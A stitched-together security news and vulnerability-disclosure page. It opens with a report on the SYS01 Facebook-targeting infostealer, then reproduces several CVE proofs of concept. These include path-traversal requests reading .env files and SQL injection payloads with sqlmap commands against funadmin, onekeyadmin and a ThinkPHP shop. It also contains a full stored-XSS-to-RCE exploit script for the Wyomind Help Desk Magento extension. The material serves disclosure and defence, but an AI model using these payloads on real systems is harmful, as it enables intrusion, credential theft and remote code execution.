By Deeba Ahmed
The researchers have been tracking the malware campaign since November 2020.
This is a post from HackRead.com Read the original post: Beware of Fake Facebook Profiles, Google Ads Pushing Sys01 Stealer

****For now, SYS01 stealer is targeting Facebook accounts of employees working for manufacturing companies, critical government infrastructures, and other sensitive industries.****

The cybersecurity researchers at Morphisec have revealed details of an advanced **information-stealing malware** campaign which they began tracking in November 2022. They dubbed the malware SYS01 Stealer.

Researchers noted that SYS01 Stealer has been targeting critical government infrastructure and manufacturing firms’ employees. The attackers are targeting Facebook business accounts of their targets through Google ads and **fake Facebook profiles**, which promote games, cracked software, and adult content to compel their victims into downloading a malicious ZIP file.

The malicious use of Google Ads should not come as a surprise, since crooks have been abusing Google’s Ad Ecosystem for some years now. Just **a couple of weeks ago**, Google Ads were found to be spreading malware in fake messenger and browser apps.

The malware is executed on the target’s machine through DLL side-loading. The campaign was first noticed in May 2022, when it was attributed to **Zscaler’s Ducktail operation**, which was later rendered incorrect.

**Detailed analysis**

In a **blog post**, Morphisec researchers wrote that the archive has a legitimate application as a loader, which is vulnerable to DLL side-loading, and a malicious library, which drops the Inno-Setup installer through side-loading. In turn, the final payload is deployed as a PHP application, which actually contains malicious scripts that perform data exfiltration. Archive persistence is ensured through a PHP script.

It performs this task by setting a scheduled task. The main stealer script supports numerous other tasks, including letting the attacker check whether the victim is logged in and has a **Facebook account**.

Furthermore, this script also supports the downloading and execution of files from a certain URL and can upload files to the C2 server. It may also execute commands.

**What’s the Objective?**

This campaign is designed to steal sensitive details from the victims’ devices, such as cookies, login data, and personal and **business Facebook account information**. The attacker has included Rust, PHP, Python, and advanced PHP encoders to advance the delivery chain, which has helped them evade security vendors successfully for the past five months.

Infection chain

**SYS01 Similarities with other Infostealer?**

Morphisec analysis revealed that SYS01 uses the same loading techniques and lures as the **S1deload infostealer** (PDF) discovered by Bitdefender. However, it is worth noting that the final payload isn’t the same.

You can stay protected from SYS01 stealer by implementing a zero-trust policy and restricting users’ rights to download and install programs. Since this campaign is based on social engineering, users should be aware of the tricks adversaries can use against them.

**Protect Yourself**

If you are an employee at a government or critical infrastructure organization, you should watch out for malware attacks, especially on social media sites. Here are some steps on how to do so:

*   Be wary of unsolicited messages, friend requests, and links from unknown sources on social media platforms like Facebook.
*   Verify the identity of the sender before clicking on any links or downloading any attachments.
*   Install and update anti-virus software and firewalls on your device and make sure they are up-to-date with the latest security patches.
*   Use strong and unique passwords for your social media accounts and avoid reusing passwords across different accounts.
*   Enable two-factor authentication (2FA) to provide an extra layer of protection for your accounts.
*   Avoid using public Wi-Fi networks, especially when accessing sensitive information or logging into social media accounts.
*   Regularly back up important data to an external hard drive or cloud storage service.
*   Report any suspicious activity, messages or links to your organization’s IT department immediately.
*   Stay informed about the latest malware and cyber security trends by attending regular training sessions and seminars.
*   Follow your organization’s security policies and procedures, including those for social media use.

1.  **Crooks using Messenger chatbots to steal login data**
2.  **Fake Brave browser dropped malware from Google Ads**
3.  **Schoolyard Bully malware stealing Facebook credentials**
4.  **Google Ads malware wipes NFT influencer’s crypto wallet**
5.  **Mandrake Android malware stealing Facebook, crypto data**

Beware of Fake Facebook Profiles, Google Ads Pushing Sys01 Stealer

Prometei botnet continued its activity since Cisco Talos first reported about it in 2020.  Since November 2022, we have observed Prometei improving the infrastructure components and capabilities.

Prometei botnet improves modules and exhibits new capabilities in recent updates

emacsclient-mail.desktop in Emacs 28.1 through 28.2 is vulnerable to Emacs Lisp code injections through a crafted mailto: URI with unescaped double-quote characters.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

CVE-2023-27986: security - Shell command and Emacs Lisp code injection in emacsclient-mail.desktop

onekeyadmin v1.3.9 was discovered to contain an arbitrary file read vulnerability via the component /admin1/file/download.

1.  Vulnerability affects product:onekeyadmin
2.  Vulnerability affects version 1.3.9
3.  Vulnerability type:file reading
4.  Vulnerability Details：  
    Vulnerability location  
    Vulnerability occurs in  
    The app\\admin\\controller\\File#download method directly does not filter the incoming url, causing arbitrary file reading

Vulnerability reproduction Read the database configuration file.env  
GET /admin1/file/download?url=../.env&title=英文.png HTTP/1.1 Host: 192.168.3.129:8091 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.3.129:8091/admin1/file/index Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def Connection: close

CVE-2023-26948: Background arbitrary file reading vulnerability 2 · Issue #5 · keheying/onekeyadmin

Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the id parameter at /databases/table/list.

Vulnerability Product:funadmin  
Vulnerability version:.3.2.0  
Vulnerability type:sql injection  
Vulnerability Details：  
Database management plug-in table.php list-sql injection vulnerability  
Vulnerability occurs in plugin - database management plugin  
  
Code Audit Process  
Vulnerability occurs in  
app\\databases\\controller\\table.php#list method  
  
  
Get the id directly and splice it into the sql statement  
Vulnerability recurrence  
\`POST /databases/table/list?id='+UNION+ALL+SELECT+NULL,CONCAT(0x7162626b71,user(),0x71766a6b71),NULL,NULL,NULL,NULL,NULL,NULL%23 HTTP/1.1  
Host: 192.168.3.129:8092  
Content-Length: 187  
Accept: application/json, text/javascript, _/_; q=0.01  
X-Requested-With: XMLHttpRequest  
X-CSRF-TOKEN: d659d1ffb4e68ff1910c1c7c75a43539  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: http://192.168.3.129:8092  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: Hm\_lvt\_ce074243117e698438c49cd037b593eb=1673498041; ci\_session=ca40t5m9pvlvp7gftr11qng0g0lofceq; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think\_lang=zh-cn; Hm\_lvt\_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm\_lpvt\_8dcaf664827c0e8ae52287ebb2411aed=1674888420; auth\_account=YToxOntzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI3OiJleUowZVhBaU9pSktWMVFpTENKaGJHY2lPaUpJVXpJMU5pSjkuZXlKdFpXMWlaWEpmYVdRaU9qRTFORGdzSW1Gd2NHbGtJam9pSWl3aVlYQndjMlZqY21WMElqb2lJaXdpYVhOeklqb2lhSFIwY0hNNkx5OTNkM2N1Wm5WdVlXUnRhVzR1WTI5dElpd2lZWFZrSWpvaWFIUjBjSE02THk5M2QzY3VablZ1WVdSdGFXNHVZMjl0SWl3aWMyTnZjR1Z6SWpvaWNtOXNaVjloWTJObGMzTWlMQ0pwWVhRaU9qRTJOelE0T0RrMU1EQXNJbTVpWmlJNk1UWTNORGc0T1RVd01Dd2laWGh3SWpveE5qYzFOVGd3TnpBd2ZRLkJITHd5WU5nNkpVVUZmMFFucGM0aHk2YlZ1c1V6WkVqR3N2SElva0pxYU0iO30%3D; clound\_account=YTo0OntzOjI6ImlkIjtpOjE1NDg7czo4OiJ1c2VybmFtZSI7czoxMDoibXlmdW5hZG1pbiI7czo4OiJuaWNrbmFtZSI7czowOiIiO3M6NjoiYXZhdGFyIjtzOjM2OiIvc3RhdGljL2Zyb250ZW5kL2ltYWdlcy9hdmF0YXIvNi5qcGciO30%3D  
Connection: close

TABLE\_NAME=fun\_addon&ENGINE=InnoDB&TABLE\_COMMENT=%E5%85%AC%E7%94%A8\_%E6%8F%92%E4%BB%B6%E8%A1%A81&TABLE\_ROWS=7&TABLE\_COLLATION=utf8mb4\_unicode\_ci&**token**\=d659d1ffb4e68ff1910c1c7c75a43539\`

CVE-2023-24777: Database management plug-in table.php list-sql injection vulnerability · Issue #5 · funadmin/funadmin

Directory Traversal vulnerability in Wyomind Help Desk Magento 2 extension v.1.3.6 and before fixed in v.1.3.7 allows attacker to execute arbitrary code via the file attachment directory setting.

    # Exploit Title: Wyomind Help Desk 1.3.6 - Remote Code Execution (RCE) 
    # Date: 2021-07-07
    # Exploit Author: Patrik Lantz
    # Vendor Homepage: https://www.wyomind.com/magento2/helpdesk-magento-2.html
    # Version: <= 1.3.6
    # Tested on: Ubuntu 18.04-20.04, Apache, PHP 7.2, Magento 2
    
    
    The Mangento 2 Help Desk extension from Wyomind up to and including version 1.3.6 is vunerable to stored XSS, directory traversal and  unrestricted upload of a dangerous file type. These vulnerabilites combined could lead to code execution.
    
    A XSS payload can be sent via the ticket message from the front-end in the 'Support - My tickets' section. 
    The payload is triggered when an administrator views the ticket in the Magento 2 backend. The following request enable
    the delivery of the XSS payload:
    
    POST /helpdesk/customer/ticket_save/ HTTP/1.1
    Host: <redacted>
    Content-Type: multipart/form-data; boundary=---------------------------243970849510445067673127196635
    Content-Length: 683
    Origin: https://<redacted>
    Connection: close
    Referer: https://<redacted>/helpdesk/customer/ticket_view/
    Cookie: <redacted>
    Upgrade-Insecure-Requests: 1
    
    -----------------------------243970849510445067673127196635
    Content-Disposition: form-data; name="form_key"
    
    <redacted>
    -----------------------------243970849510445067673127196635
    Content-Disposition: form-data; name="object"
    
    Hello
    -----------------------------243970849510445067673127196635
    Content-Disposition: form-data; name="message_cc"
    
    
    -----------------------------243970849510445067673127196635
    Content-Disposition: form-data; name="content"
    
    <p><script>alert(1)</script></p>
    -----------------------------243970849510445067673127196635
    Content-Disposition: form-data; name="hideit"
    
    
    -----------------------------243970849510445067673127196635--
    
    
    
    The following XSS payload shown below can be used to trigger 
    
    1) Enabling file attachments in ticket messages
    2) Adding 'phar' to allowed file extensions
    3) Setting the attachment directory to 'helpdesk/files/../../../pub'
    
    
    <script>
    function successListener(e) {    
    	var doc = e.target.response
    	var action=doc.getElementById('config-edit-form').action;
    	
    	function submitRequest()
    	{
    	var formKey = FORM_KEY;
    	var xhr = new XMLHttpRequest();
    	xhr.open("POST", action, true);
    	xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------14303502862141221692667966053");
    	xhr.withCredentials = true;
    	var body = "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"form_key\"\r\n" + 
    	  "\r\n" + 
    	  formKey + "\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_license]\"\r\n" + 
    	  "\r\n" + 
    	  "0\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_general]\"\r\n" + 
    	  "\r\n" + 
    	  "1\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[general][fields][enabled][value]\"\r\n" + 
    	  "\r\n" + 
    	  "1\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[general][fields][log][value]\"\r\n" + 
    	  "\r\n" + 
    	  "0\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[general][fields][default_email][value]\"\r\n" + 
    	  "\r\n" + 
    	  "\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[general][fields][default_status][value]\"\r\n" + 
    	  "\r\n" + 
    	  "1\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[general][fields][pending_status][value]\"\r\n" + 
    	  "\r\n" + 
    	  "2\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[general][fields][closed_status][value]\"\r\n" + 
    	  "\r\n" + 
    	  "3\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[general][fields][ticket_prefix][value]\"\r\n" + 
    	  "\r\n" + 
    	  "10000\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_frontend]\"\r\n" + 
    	  "\r\n" + 
    	  "1\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[frontend][fields][menu_label][value]\"\r\n" + 
    	  "\r\n" + 
    	  "Support - My Tickets\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[frontend][fields][top_link_enabled][value]\"\r\n" + 
    	  "\r\n" + 
    	  "1\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[frontend][fields][attachments][value]\"\r\n" + 
    	  "\r\n" + 
    	  "1\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_frontend_attachments_settings]\"\r\n" + 
    	  "\r\n" + 
    	  "1\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[frontend][groups][attachments_settings][fields][attachments_extension][value]\"\r\n" + 
    	  "\r\n" + 
    	  "jpeg,gif,png,pdf,phar\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[frontend][groups][attachments_settings][fields][attachments_directory_path][value]\"\r\n" + 
    	  "\r\n" + 
    	  "helpdesk/files/../../../pub\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[frontend][groups][attachments_settings][fields][attachments_upload_max_filesize][value]\"\r\n" + 
    	  "\r\n" + 
    	  "2M\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[frontend][groups][attachments_settings][fields][attachments_post_max_size][value]\"\r\n" + 
    	  "\r\n" + 
    	  "4M\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_emails]\"\r\n" + 
    	  "\r\n" + 
    	  "1\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_emails_customer_settings]\"\r\n" + 
    	  "\r\n" + 
    	  "0\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[emails][groups][customer_settings][fields][confirmation_enabled][value]\"\r\n" + 
    	  "\r\n" + 
    	  "0\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[emails][groups][customer_settings][fields][confirmation_content][value]\"\r\n" + 
    	  "\r\n" + 
    	  "Dear {{customer_firstname}},\x3cbr/\x3e\x3cbr/\x3e\r\n" + 
    	  "Your message has been sent to the support team.\r\n" + 
    	  "Here is the message content:\x3cbr/\x3e\r\n" + 
    	  "\"{{message}}\" \x3cbr/\x3e\x3cbr/\x3e\r\n" + 
    	  "Kind Regards,\r\n" + 
    	  "The Support Team.\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[emails][groups][customer_settings][fields][notification_enabled][value]\"\r\n" + 
    	  "\r\n" + 
    	  "0\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[emails][groups][customer_settings][fields][notification_content][value]\"\r\n" + 
    	  "\r\n" + 
    	  "Hello {{customer_firstname}},\x3cbr/\x3e\x3cbr/\x3e\r\n" + 
    	  "Your ticket \"{{ticket_object}}\" (#{{prefixed_id}}) has been updated.\r\n" + 
    	  "Please login to your account via this link in order to see the new message: {{customer_account_link}}\x3cbr/\x3e\x3cbr/\x3e\r\n" + 
    	  "Regards,\r\n" + 
    	  "The Support Team.\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_emails_support_team_settings]\"\r\n" + 
    	  "\r\n" + 
    	  "0\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[emails][groups][support_team_settings][fields][notification_enabled][value]\"\r\n" + 
    	  "\r\n" + 
    	  "0\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[emails][groups][support_team_settings][fields][notification_content][value]\"\r\n" + 
    	  "\r\n" + 
    	  "You received a new message from a customer.\r\n" + 
    	  "-----------------------------14303502862141221692667966053--\r\n";
    	var aBody = new Uint8Array(body.length);
    	for (var i = 0; i < aBody.length; i++)
    	aBody[i] = body.charCodeAt(i); 
    	xhr.send(new Blob([aBody]));
    	}
    	submitRequest();
    }
    	
    var request = new XMLHttpRequest();  
    request.onload = successListener;    
    request.responseType = 'document';
    request.open('GET', document.querySelector('[data-ui-id="menu-wyomind-helpdesk-configuration"]').querySelector('a').href, true);  
    request.send();
    </script> 
    
    After the XSS payload is executed, it is possible to upload a phar file by attaching files to ticket messages. Upon successful upload, the uploaded files can be requested to trigger the execution of it by requesting
    
    https://[HOSTNAME]/<ticketId>/<messageId>/filename.phar 
    
    ticketId and messageId can be identified after sending the ticket message with the attached phar file. The ticketId is visible in the 
    URL, for example: 
    
    https://[HOSTNAME]/helpdesk/customer/ticket_view/ticket_id/7/
    
    and the messageId can be identified by hovering over the uploaded file link which will be similar to 
    
    https://[HOSTNAME]/helpdesk/customer/message_downloadAttachment/message/40/file/filename.phar
    
    in this case, the messageId is 40.

CVE-2021-33353: Offensive Security’s Exploit Database Archive

Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the id parameter at /databases/database/edit.

Vulnerability Product:funadmin  
Vulnerability version:.3.2.0  
Vulnerability type:sql injection  
Vulnerability Details：  
Vulnerability occurs in plugin - database management plugin  

Code Audit Process  
Vulnerability occurs in  
app\\databases\\controller\\Database.php#edit method  
  
Get the id directly and splice it into the sql statement  
Vulnerability recurrence  
Conditions: background administrator rights  
sqlmap poc save as txt

\`POST /databases/database/edit?id=fun\_addon\* HTTP/1.1  
Host: 192.168.3.129:8092  
Content-Length: 187  
Accept: application/json, text/javascript, _/_; q=0.01  
X-Requested-With: XMLHttpRequest  
X-CSRF-TOKEN: d659d1ffb4e68ff1910c1c7c75a43539  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: http://192.168.3.129:8092  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: Hm\_lvt\_ce074243117e698438c49cd037b593eb=1673498041; ci\_session=ca40t5m9pvlvp7gftr11qng0g0lofceq; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think\_lang=zh-cn; Hm\_lvt\_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm\_lpvt\_8dcaf664827c0e8ae52287ebb2411aed=1674888420;  
Connection: close

TABLE\_NAME=fun\_addon&ENGINE=InnoDB&TABLE\_COMMENT=%E5%85%AC%E7%94%A8\_%E6%8F%92%E4%BB%B6%E8%A1%A81&TABLE\_ROWS=7&TABLE\_COLLATION=utf8mb4\_unicode\_ci&**token**\=d659d1ffb4e68ff1910c1c7c75a43539\`  
python sqlmap.py -r poc.txt

CVE-2023-24782: Database management plug-in database.php edit-sql registration vulnerability · Issue #3 · funadmin/funadmin

onekeyadmin v1.3.9 was discovered to contain an arbitrary file read vulnerability via the component /admin1/curd/code.

Vulnerability affects product:onekeyadmin  
Vulnerability affects version 1.3.9  
Vulnerability type:file reading  
Vulnerability Details：  
Vulnerability location  
app\\admin\\controller\\Curd#code Here the file\_get\_contents function is called without any filtering  

So we can write the file we want to read into menu.png to cause any file to be read

Vulnerability recurrence  
Here we read the database configuration file .env in the root directory

poc  
\`POST /admin1/curd/code HTTP/1.1  
Host: 192.168.3.129:8091  
Content-Length: 59  
Accept: _/_  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Content-Type: application/json;charset=UTF-8  
Origin: http://192.168.3.129:8091  
Referer: http://192.168.3.129:8091/admin1/curd/index  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def  
Connection: close

{"name":"test","title":"test","cover":"../.env","table":\[\]}\`  

You can see that the file was successfully written to our menu.png, causing any file to be read  
http://192.168.3.129:8091/plugins/test/menu.png

CVE-2023-26956: Background development assistant arbitrary file reading vulnerability · Issue #4 · keheying/onekeyadmin

A vulnerability, which was classified as problematic, has been found in IBOS up to 4.5.5. Affected by this issue is some unknown functionality of the file mobil/index.php. The manipulation of the argument accesstoken leads to cross site scripting. The attack may be launched remotely. The identifier of this vulnerability is VDB-222608.

CVE-2023-1278

A vulnerability, which was classified as critical, has been found in SUL1SS_shop. This issue affects some unknown processing of the file application\merch\controller\Order.php. The manipulation of the argument keyword leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The associated identifier of this vulnerability is VDB-222599.

**SQLi Vulnerability in SUL1SS\_shop**

**Project:** https://github.com/617746883/thinkphp5.0\_shop

A shop application developed by ThinkPHP5

Download and deploy in the web directory, and import the database file (install.sql)

**Before starting,** if you need to install the system, you may need to modify the database file (install.sql) to allow you to log in.

    'admin', 'f374baf63f70a5c2c4d172a0a6e37897', 'U66yPU04'
    

modify it to

    'admin', 'a7da35830936caa0258da1c26c42d6ff', 'lVRVVp9g'
    

In this way, the password becomes 123456, and you can **start testing the vulnerability.**

(Since this vulnerability exists in the background, it cannot be exploited if you do not know the password.)

Visit and log in to the background, for example: http://192.168.159.133:8080/index.php/admin/login/index.html

Username:admin

Password:123456

Vulnerable file: **application\\merch\\controller\\Order.php**

The **$keyword** variable is passed in by the GET method. When other variables meet the judgment conditions, it can finally be **spliced into the SQL statement to cause SQL injection.**

The resulting SQL statement is executed, resulting in blind injection.

**Payload:**

    http://192.168.159.133:8080/index.php/admin/order/olist_all.html?paytype=&searchtime=&time[start]=2023-02-04+15%3A02&time[end]=2023-03-04+15%3A02&searchfield=ordersn&keyword=1%27&export=0
    

**sqlmap payload(Replace the cookie with your own):**

    sqlmap -u "http://192.168.159.133:8080/index.php/admin/order/olist_all.html?paytype=&searchtime=&time%5Bstart%5D=2023-02-04+15%3A02&time%5Bend%5D=2023-03-04+15%3A02&searchfield=ordersn&keyword=1*&export=0" --cookie="thinkphp_show_page_trace=0|0; login%40=60ae28k2vl20sg2gi9reljav61" --current-user

Tag

#php